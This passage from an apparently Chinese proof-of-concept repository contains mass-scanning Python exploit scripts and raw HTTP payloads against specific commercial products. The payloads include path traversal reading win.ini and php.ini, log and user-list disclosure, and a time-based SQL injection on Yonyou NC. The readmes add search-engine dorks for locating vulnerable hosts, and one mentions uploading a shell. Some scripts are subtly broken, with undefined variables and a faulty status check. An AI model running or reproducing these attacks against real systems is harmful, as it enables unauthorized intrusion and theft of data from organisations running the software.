"zh-CN,zh;q=0.9,en;q=0.8", 47 | "Content-Type": "application/x-www-form-urlencoded" 48 | 49 | } 50 | data=''' 51 | 
type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc 52 | ''' 53 | 54 | try: 55 | response = requests.post(url, headers=headers, data=data, verify=False, timeout=15) 56 | # print(response.request.body) 57 | # print(response.content) 58 | randstr = r"id" 59 | if randstr in response.text and response.status_code == 200: 60 | print(f"[+] {target} 存在 敏感信息泄露漏洞 ") 61 | else: 62 | print(f"[-] {target} 未发现 敏感信息泄露") 63 | except Exception as e: 64 | print(f"[*] {target} error: {str(e)}") 65 | 66 | 67 | def extract_host(url): 68 | """ 69 | 从 URL 中提取主机地址和端口号,返回 (host, port) 70 | """ 71 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 72 | if match: 73 | prefix, host, port = match.groups() 74 | if not port: 75 | if prefix and "https" in prefix: 76 | port = "443" 77 | else: 78 | port = "80" 79 | return host, int(port) 80 | else: 81 | return None, None 82 | 83 | 84 | def main(): 85 | banner() 86 | parser = argparse.ArgumentParser(description='canal admin weak Password') 87 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 88 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 89 | args = parser.parse_args() 90 | 91 | if args.url and not args.file: 92 | if "https://" in args.url or "http://" in args.url: 93 | url = args.url 94 | else: 95 | host, port = extract_host(args.url) 96 | url = f"http://{host}:{port}" 97 | poc(url) 98 | 99 | elif args.url is None and args.file is not None: 100 | url_list = [] 101 | with open(args.file, "r", encoding="utf-8") as f: 102 | for url in f.readlines(): 103 | url = url.strip().replace("\n", "") 104 | if "https://" in url or "http://" in url: 105 | url = url 106 | else: 107 | host, port = extract_host(url) 108 | url = f"http://{host}:{port}" 109 | url_list.append(url) 110 | 111 | pool = Pool(10) 112 | pool.map(poc, url_list) 113 | pool.close() 114 | pool.join() 115 | 116 | else: 117 | parser.print_help() 118 | 119 | 120 | if 
__name__ == '__main__': 121 | main() 122 | -------------------------------------------------------------------------------- /20240102某神SecGate3600 authManageSet.cgi信息泄露漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 某神SecGate3600 authManageSet.cgi信息泄露漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa语法 6 | 7 | ``` 8 | body="sec_gate_image/login_02.gif"fid="ldb0WVBlAgZloMw9AAge0A==" 9 | ``` 10 | 11 | POC: 12 | 13 | ``` 14 | POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1Host: your-ipContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateConnection: close type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc 15 | ``` 16 | 17 | 18 | 19 | 20 | 21 | 批量poc(记得安装库) 22 | 23 | python poc.py -u 24 | 25 | 26 | 27 | python poc.py -f .txt 28 | 29 | -------------------------------------------------------------------------------- /20240103FreeRDP存在任意文件读取漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | from multiprocessing.dummy import Pool 7 | 8 | import requests 9 | import urllib3 10 | from rich.console import Console 11 | 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | 15 | def banner(): 16 | test = """ 17 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 18 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 19 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 20 | "8aa8" 88 88,d88' 88 88 `8b 88 88 21 | `88' 88 8888"88, 88 88 `8b 88 88 88888 22 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 23 | 88 88 88 "88, 88 88 `888 `"Y88888P" 24 | 25 | 888888888888 26 | 27 | tag: this is a FreeRDP存在任意文件读取漏洞 poc 28 | @version: 1.0.3 
@author: Y1_K1NG 29 | """ 30 | print(test) 31 | 32 | 33 | def poc(target): 34 | if target[-1] == '/': 35 | target = target 36 | else: 37 | target = target + "/" 38 | url = target + "../../../../../../../../Windows/win.ini" 39 | 40 | 41 | headers = { 42 | "User-Agent": "Mozilla/5.0", 43 | 44 | } 45 | 46 | 47 | try: 48 | response = requests.get(url, headers=headers, verify=False, timeout=15) 49 | # print(response.request.body) 50 | # print(response.content) 51 | randstr = r"id" 52 | if response.status_code == 200 and ("for 16-bit app support" in response.text): 53 | print(f"[+] {target} 存在 任意文件读取 ") 54 | else: 55 | print(f"[-] {target} 未发现 任意文件读取") 56 | except Exception as e: 57 | print(f"[*] {target} error: {str(e)}") 58 | 59 | 60 | def extract_host(url): 61 | """ 62 | 从 URL 中提取主机地址和端口号,返回 (host, port) 63 | """ 64 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 65 | if match: 66 | prefix, host, port = match.groups() 67 | if not port: 68 | if prefix and "https" in prefix: 69 | port = "443" 70 | else: 71 | port = "80" 72 | return host, int(port) 73 | else: 74 | return None, None 75 | 76 | 77 | def main(): 78 | banner() 79 | parser = argparse.ArgumentParser(description='canal admin weak Password') 80 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 81 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 82 | args = parser.parse_args() 83 | 84 | if args.url and not args.file: 85 | if "https://" in args.url or "http://" in args.url: 86 | url = args.url 87 | else: 88 | host, port = extract_host(args.url) 89 | url = f"http://{host}:{port}" 90 | poc(url) 91 | 92 | elif args.url is None and args.file is not None: 93 | url_list = [] 94 | with open(args.file, "r", encoding="utf-8") as f: 95 | for url in f.readlines(): 96 | url = url.strip().replace("\n", "") 97 | if "https://" in url or "http://" in url: 98 | url = url 99 | else: 100 | host, port = extract_host(url) 101 | url = 
f"http://{host}:{port}" 102 | url_list.append(url) 103 | 104 | pool = Pool(10) 105 | pool.map(poc, url_list) 106 | pool.close() 107 | pool.join() 108 | 109 | else: 110 | parser.print_help() 111 | 112 | 113 | if __name__ == '__main__': 114 | main() 115 | -------------------------------------------------------------------------------- /20240103FreeRDP存在任意文件读取漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # FreeRDP存在任意文件读取漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa:body="css/vkb.css" 6 | 7 | POC: 8 | 9 | /../../../../../../../../Windows/win.ini 10 | 11 | 12 | 13 | 直接GET请求即可 14 | 15 | 16 | 17 | 批量poc(记得安装库) 18 | 19 | python poc.py -u 20 | 21 | 22 | 23 | python poc.py -f .txt 24 | 25 | -------------------------------------------------------------------------------- /20240104某友CRM存在任意文件读取/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | from multiprocessing.dummy import Pool 7 | 8 | import requests 9 | import urllib3 10 | from rich.console import Console 11 | 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | 15 | def banner(): 16 | test = """ 17 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 18 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 19 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 20 | "8aa8" 88 88,d88' 88 88 `8b 88 88 21 | `88' 88 8888"88, 88 88 `8b 88 88 88888 22 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 23 | 88 88 88 "88, 88 88 `888 `"Y88888P" 24 | 25 | 888888888888 26 | 27 | tag: this is a 某友CRM存在任意文件读取 poc 28 | @version: 1.0.0 @author: Y1_K1NG 29 | """ 30 | print(test) 31 | 32 | 33 | def poc(target): 34 | if target[-1] == '/': 35 | target = target 36 | else: 37 | target = target + "/" 38 | url = target + "pub/help2.php?key=/../../apache/php.ini" 39 | 40 | 41 | headers = 
{ 42 | "User-Agent": "Mozilla/5.0", 43 | 44 | } 45 | 46 | try: 47 | response = requests.get(url, headers=headers, verify=False, timeout=15) 48 | # print(response.request.body) 49 | # print(response.content) 50 | randstr = r"id" 51 | if response.status_code == 200 and ("for 16-bit app support" in response.text): 52 | print(f"[+] {target} 存在 任意文件读取 ") 53 | else: 54 | print(f"[-] {target} 未发现 任意文件读取") 55 | except Exception as e: 56 | print(f"[*] {target} error: {str(e)}") 57 | 58 | 59 | def extract_host(url): 60 | """ 61 | 从 URL 中提取主机地址和端口号,返回 (host, port) 62 | """ 63 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 64 | if match: 65 | prefix, host, port = match.groups() 66 | if not port: 67 | if prefix and "https" in prefix: 68 | port = "443" 69 | else: 70 | port = "80" 71 | return host, int(port) 72 | else: 73 | return None, None 74 | 75 | 76 | def main(): 77 | banner() 78 | parser = argparse.ArgumentParser(description='canal admin weak Password') 79 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 80 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 81 | args = parser.parse_args() 82 | 83 | if args.url and not args.file: 84 | if "https://" in args.url or "http://" in args.url: 85 | url = args.url 86 | else: 87 | host, port = extract_host(args.url) 88 | url = f"http://{host}:{port}" 89 | poc(url) 90 | 91 | elif args.url is None and args.file is not None: 92 | url_list = [] 93 | with open(args.file, "r", encoding="utf-8") as f: 94 | for url in f.readlines(): 95 | url = url.strip().replace("\n", "") 96 | if "https://" in url or "http://" in url: 97 | url = url 98 | else: 99 | host, port = extract_host(url) 100 | url = f"http://{host}:{port}" 101 | url_list.append(url) 102 | 103 | pool = Pool(10) 104 | pool.map(poc, url_list) 105 | pool.close() 106 | pool.join() 107 | 108 | else: 109 | parser.print_help() 110 | 111 | 112 | if __name__ == '__main__': 113 | main() 114 | 
-------------------------------------------------------------------------------- /20240104某友CRM存在任意文件读取/readme.md: -------------------------------------------------------------------------------- 1 | # 某友CRM存在任意文件读取 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | hunter:app.name="用友 CRM" 6 | 7 | POC: 8 | 9 | /pub/help2.php?key=/../../apache/php.ini 10 | 11 | 12 | 13 | 直接GET请求即可 14 | 15 | 16 | 17 | 批量poc(记得安装库) 18 | 19 | python poc.py -u 20 | 21 | 22 | 23 | python poc.py -f .txt 24 | 25 | -------------------------------------------------------------------------------- /20240105用友sql注入/readme.md: -------------------------------------------------------------------------------- 1 | # 用友NC 存在sql注入\ 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa:"NCCloud" 6 | 7 | POC: 8 | 9 | POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1 10 | Host: 192.168.100.1:8091 11 | Pragma: no-cache 12 | Content-Type: application/x-www-form-urlencoded 13 | Origin: http://192.168.100.1:8091 14 | Accept-Encoding: gzip, deflate 15 | Accept-Language: zh-CN,zh;q=0.9 16 | Accept: */* 17 | Referer: http://192.168.100.1:8091/hrss/ResetPwd.jsp 18 | Cookie: JSESSIONID=C2CFFE1429FF812ABF357C2BDD5BDBC1.server; JSESSIONID=8FEF31DBA1E3188706B14123C6D1CE87.server 19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 20 | Content-Length: 672 21 | 22 | 
__type=updateData&__viewInstanceId=nc.bs.hrss.login.ResetPassword~nc.bs.hrss.login.ResetPasswordViewModel&__xml=%3Crpc%20transaction%3D%2210%22%20method%3D%22resetPwd%22%3E%3Cdef%3E%3Cdataset%20type%3D%22Custom%22%20id%3D%22dsResetPwd%22%3E%3Cf%20name%3D%22user%22%3E%3C/f%3E%3Cf%20name%3D%22ID%22%3E%3C/f%3E%3C/dataset%3E%3C/def%3E%3Cdata%3E%3Crs%20dataset%3D%22dsResetPwd%22%3E%3Cr%20id%3D%2210009%22%20state%3D%22insert%22%3E%3Cn%3E%3Cv%3E1';WAITFOR DELAY '0:0:6'--%3C/v%3E%3Cv%3E11111111111111111111%3C/v%3E%3C/n%3E%3C/r%3E%3C/rs%3E%3C/data%3E%3Cvps%3E%3Cp%20name%3D%22__profileKeys%22%3EfindPwd%253B15b021628b8411d33569071324dc1b37%3C/p%3E%3C/vps%3E%3C/rpc%3E&1700109885028 23 | 24 | 25 | 26 | 27 | 28 | 批量poc(记得安装库) 29 | 30 | python poc.py -u 31 | 32 | 33 | 34 | python poc.py -f .txt 35 | 36 | -------------------------------------------------------------------------------- /20240106某友CRM存在日志信息泄露/assets/image-20240107234411105.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240106某友CRM存在日志信息泄露/assets/image-20240107234411105.png -------------------------------------------------------------------------------- /20240106某友CRM存在日志信息泄露/assets/image-20240107234454131.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240106某友CRM存在日志信息泄露/assets/image-20240107234454131.png -------------------------------------------------------------------------------- /20240106某友CRM存在日志信息泄露/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | from multiprocessing.dummy import Pool 7 | 8 | import requests 9 | import urllib3 10 | from rich.console import Console 11 | 12 | 
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | 15 | def banner(): 16 | test = """ 17 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 18 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 19 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 20 | "8aa8" 88 88,d88' 88 88 `8b 88 88 21 | `88' 88 8888"88, 88 88 `8b 88 88 88888 22 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 23 | 88 88 88 "88, 88 88 `888 `"Y88888P" 24 | 25 | 888888888888 26 | 27 | tag: this is a 用友U8-CRM 信息泄露 poc 28 | @version: 1.0.0 @author: Y1_K1NG 29 | """ 30 | print(test) 31 | 32 | 33 | def poc(target): 34 | if target[-1] == '/': 35 | target = target 36 | else: 37 | target = target + "/" 38 | url = target + "datacache/crmdebug.log" 39 | url2 = target + "datacache/solr.log" 40 | 41 | headers = { 42 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", 43 | } 44 | 45 | try: 46 | response1 = requests.get(url=url, headers=headers, verify=False, timeout=15) 47 | response2 = requests.get(url=url2, headers=headers, verify=False, timeout=15) 48 | 49 | # print(response.request.body) 50 | # print(response.content) 51 | 52 | if response1.status_code == 200 or response2.status_code: 53 | print(f"[+] {target} 存在 信息泄露 ") 54 | else: 55 | print(f"[-] {target} 未发现 信息泄露") 56 | except Exception as e: 57 | print(f"[*] {target} error: {str(e)}") 58 | 59 | 60 | def extract_host(url): 61 | """ 62 | 从 URL 中提取主机地址和端口号,返回 (host, port) 63 | """ 64 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 65 | if match: 66 | prefix, host, port = match.groups() 67 | if not port: 68 | if prefix and "https" in prefix: 69 | port = "443" 70 | else: 71 | port = "80" 72 | return host, int(port) 73 | else: 74 | return None, None 75 | 76 | 77 | def main(): 78 | banner() 79 | parser = argparse.ArgumentParser(description='canal admin weak Password') 80 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 
81 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 82 | args = parser.parse_args() 83 | 84 | if args.url and not args.file: 85 | if "https://" in args.url or "http://" in args.url: 86 | url = args.url 87 | else: 88 | host, port = extract_host(args.url) 89 | url = f"http://{host}:{port}" 90 | poc(url) 91 | 92 | elif args.url is None and args.file is not None: 93 | url_list = [] 94 | with open(args.file, "r", encoding="utf-8") as f: 95 | for url in f.readlines(): 96 | url = url.strip().replace("\n", "") 97 | if "https://" in url or "http://" in url: 98 | url = url 99 | else: 100 | host, port = extract_host(url) 101 | url = f"http://{host}:{port}" 102 | url_list.append(url) 103 | 104 | pool = Pool(10) 105 | pool.map(poc, url_list) 106 | pool.close() 107 | pool.join() 108 | 109 | else: 110 | parser.print_help() 111 | 112 | 113 | if __name__ == '__main__': 114 | main() 115 | -------------------------------------------------------------------------------- /20240106某友CRM存在日志信息泄露/readme.md: -------------------------------------------------------------------------------- 1 | # 某友CRM存在日志信息泄露 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | hunter:app.name="用友 CRM 6 | 7 | POC: 8 | 9 | /datacache/crmdebug.log 10 | 11 | /datacache/solr.log 12 | 13 | 14 | 15 | 批量poc(记得安装库) 16 | 17 | python poc.py -u 18 | 19 | python poc.py -f .txt 20 | 21 | ![image-20240107234454131](assets/image-20240107234454131.png) 22 | -------------------------------------------------------------------------------- /20240107上海某公司防火墙信息泄露/assets/image-20240108000010545.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240107上海某公司防火墙信息泄露/assets/image-20240108000010545.png -------------------------------------------------------------------------------- /20240107上海某公司防火墙信息泄露/poc1228.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | from multiprocessing.dummy import Pool 7 | 8 | import requests 9 | import urllib3 10 | from rich.console import Console 11 | 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | 15 | def banner(): 16 | test = """ 17 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 18 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 19 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 20 | "8aa8" 88 88,d88' 88 88 `8b 88 88 21 | `88' 88 8888"88, 88 88 `8b 88 88 88888 22 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 23 | 88 88 88 "88, 88 88 `888 `"Y88888P" 24 | 25 | 888888888888 26 | 27 | tag: this is a 上海冰峰网络有限公司下一代防火墙 信息泄露 poc 28 | @version: 1.0.0 @author: Y1_K1NG 29 | """ 30 | print(test) 31 | 32 | 33 | def poc(target): 34 | if target[-1] == '/': 35 | target = target 36 | else: 37 | target = target + "/" 38 | url = target + "/log/system.log" 39 | 40 | headers = { 41 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", 42 | } 43 | 44 | try: 45 | response = requests.get(url=url, 
headers=headers, verify=False, timeout=15) 46 | 47 | # print(response.request.body) 48 | # print(response.content) 49 | 50 | if response.status_code == 200 : 51 | print(f"[+] {target} 存在 信息泄露 ") 52 | else: 53 | print(f"[-] {target} 未发现 信息泄露") 54 | except Exception as e: 55 | print(f"[*] {target} error: {str(e)}") 56 | 57 | 58 | def extract_host(url): 59 | """ 60 | 从 URL 中提取主机地址和端口号,返回 (host, port) 61 | """ 62 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 63 | if match: 64 | prefix, host, port = match.groups() 65 | if not port: 66 | if prefix and "https" in prefix: 67 | port = "443" 68 | else: 69 | port = "80" 70 | return host, int(port) 71 | else: 72 | return None, None 73 | 74 | 75 | def main(): 76 | banner() 77 | parser = argparse.ArgumentParser(description='canal admin weak Password') 78 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 79 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 80 | args = parser.parse_args() 81 | 82 | if args.url and not args.file: 83 | if "https://" in args.url or "http://" in args.url: 84 | url = args.url 85 | else: 86 | host, port = extract_host(args.url) 87 | url = f"http://{host}:{port}" 88 | poc(url) 89 | 90 | elif args.url is None and args.file is not None: 91 | url_list = [] 92 | with open(args.file, "r", encoding="utf-8") as f: 93 | for url in f.readlines(): 94 | url = url.strip().replace("\n", "") 95 | if "https://" in url or "http://" in url: 96 | url = url 97 | else: 98 | host, port = extract_host(url) 99 | url = f"http://{host}:{port}" 100 | url_list.append(url) 101 | 102 | pool = Pool(10) 103 | pool.map(poc, url_list) 104 | pool.close() 105 | pool.join() 106 | 107 | else: 108 | parser.print_help() 109 | 110 | 111 | if __name__ == '__main__': 112 | main() 113 | -------------------------------------------------------------------------------- /20240107上海某公司防火墙信息泄露/readme.md: 
-------------------------------------------------------------------------------- 1 | # 上海冰峰网络有限公司下一代防火墙存在信息泄露 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | 6 | 7 | FOFA:app="ICEFLOW-VPN"POC: 8 | 9 | /log/system.log 10 | 11 | 批量poc(记得安装库) 12 | 13 | python poc.py -u 14 | 15 | python poc.py -f .txt 16 | 17 | 入圈![image-20240108000010545](assets/image-20240108000010545.png) 18 | -------------------------------------------------------------------------------- /20240108某r信topsec远程命令执行/assets/image-20240108000010545.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240108某r信topsec远程命令执行/assets/image-20240108000010545.png -------------------------------------------------------------------------------- /20240108某r信topsec远程命令执行/readme.md: -------------------------------------------------------------------------------- 1 | # 某r信TOPSEC Cookie 远程命令执行漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | 6 | 7 | title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode" 8 | 9 | 10 | 11 | 批量poc(记得安装库) 12 | 13 | python poc.py -u 14 | 15 | python poc.py -f .txt 16 | 17 | 入圈![image-20240108000010545](assets/image-20240108000010545.png) 18 | -------------------------------------------------------------------------------- /20240109金蝶云星空反序列化远程代码执行漏洞/assets/image-20240108000010545.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240109金蝶云星空反序列化远程代码执行漏洞/assets/image-20240108000010545.png -------------------------------------------------------------------------------- /20240109金蝶云星空反序列化远程代码执行漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 金蝶云星空反序列化远程代码执行漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | 6 | 7 | fofa:app="金蝶云星空-管理中心" 8 | 9 | 10 | 11 | 批量poc(记得安装库) 12 | 13 | python poc.py -u 14 | 15 | python poc.py -f .txt 16 | 17 | 入圈![image-20240108000010545](assets/image-20240108000010545.png) 18 | -------------------------------------------------------------------------------- /20240110用友NC_Cloud_soapFormat.ajax接口XXE漏洞/assets/image-20240108000010545.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240110用友NC_Cloud_soapFormat.ajax接口XXE漏洞/assets/image-20240108000010545.png -------------------------------------------------------------------------------- /20240110用友NC_Cloud_soapFormat.ajax接口XXE漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 用友NC Cloud soapFormat.ajax接口XXE漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | 6 | 7 | ZoomEye语法:app:"Yonyou NC Cloud" 8 | 9 | 10 | 11 | 批量poc(记得安装库) 12 | 13 | python poc.py -u 14 | 15 | python poc.py -f .txt 16 | 17 | 入圈![image-20240108000010545](assets/image-20240108000010545.png) 18 | -------------------------------------------------------------------------------- /20240111先锋WEB燃气收费系统 Upload.aspx 文件上传漏洞/assets/image-20240108000010545.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240111先锋WEB燃气收费系统 Upload.aspx 文件上传漏洞/assets/image-20240108000010545.png -------------------------------------------------------------------------------- /20240111先锋WEB燃气收费系统 Upload.aspx 文件上传漏洞/assets/image-20240111204822977.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240111先锋WEB燃气收费系统 Upload.aspx 文件上传漏洞/assets/image-20240111204822977.png -------------------------------------------------------------------------------- /20240111先锋WEB燃气收费系统 Upload.aspx 文件上传漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 先锋WEB燃气收费系统 Upload.aspx 文件上传漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | 6 | 7 | FOFA:app="先锋WEB燃气收费系统" 8 | 9 | 10 | 11 | 批量poc(记得安装库) 12 | 13 | python poc.py -u 14 | 15 | python poc.py -f .txt 16 | 17 | 结果保存至result.txt 18 | 19 | 利用替换文件内容上传shelll![image-20240111204822977](assets/image-20240111204822977.png) 20 | 21 | 22 | 23 | 入圈![image-20240108000010545](assets/image-20240108000010545.png) 24 | -------------------------------------------------------------------------------- /20240112用友U8 CRM系统help2 任意文件读取漏洞/assets/image-20240108000010545.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240112用友U8 CRM系统help2 任意文件读取漏洞/assets/image-20240108000010545.png -------------------------------------------------------------------------------- /20240112用友U8 CRM系统help2 任意文件读取漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | from multiprocessing.dummy import Pool 7 | 8 | import requests 9 | import urllib3 10 | from rich.console import Console 11 | 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | 15 | def banner(): 16 | test = """ 17 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 18 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 19 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 20 | "8aa8" 88 88,d88' 88 88 `8b 88 88 21 | `88' 88 8888"88, 88 88 `8b 88 88 88888 22 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 23 | 88 88 88 "88, 88 88 `888 `"Y88888P" 24 | 25 | 888888888888 26 | 27 | tag: this is a 用友U8 CRM系统help2 任意文件读取漏洞 poc 28 | @version: 1.0.0 @author: Y1_K1NG 29 | """ 30 | print(test) 31 | 32 | 33 | def poc(target): 34 | if target[-1] == '/': 35 | target = target[:-1] 36 | else: 37 | target = target 38 | url = target + "/pub/help2.php?key=/../../apache/php.ini" 39 | 40 | headers = { 41 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 
Firefox/52.0", 42 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 43 | "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", 44 | "Accept-Encoding": "gzip, deflate", 45 | "DNT": "1", 46 | "Connection": "close", 47 | "Upgrade-Insecure-Requests": "1" 48 | } 49 | 50 | try: 51 | response = requests.get(url, headers=headers, files=files, verify=False, timeout=15) 52 | # print(response.request.headers) 53 | # print(response.request.body) 54 | # print(response.text) 55 | 56 | if response.status_code == 200 : 57 | print(f"[+] {target} 存在 任意文件读取漏洞") 58 | with open("result.txt", "a+", encoding="utf-8") as f: 59 | f.write(url2 + "\n") 60 | else: 61 | print(f"[-] {target} 不存在 任意文件读取漏洞") 62 | except Exception as e: 63 | print(f"[*] {target} error: {str(e)}") 64 | 65 | 66 | def extract_host(url): 67 | """ 68 | 从 URL 中提取主机地址和端口号,返回 (host, port) 69 | """ 70 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 71 | if match: 72 | prefix, host, port = match.groups() 73 | if not port: 74 | if prefix and "https" in prefix: 75 | port = "443" 76 | else: 77 | port = "80" 78 | return host, int(port) 79 | else: 80 | return None, None 81 | 82 | 83 | def main(): 84 | banner() 85 | parser = argparse.ArgumentParser(description='canal admin weak 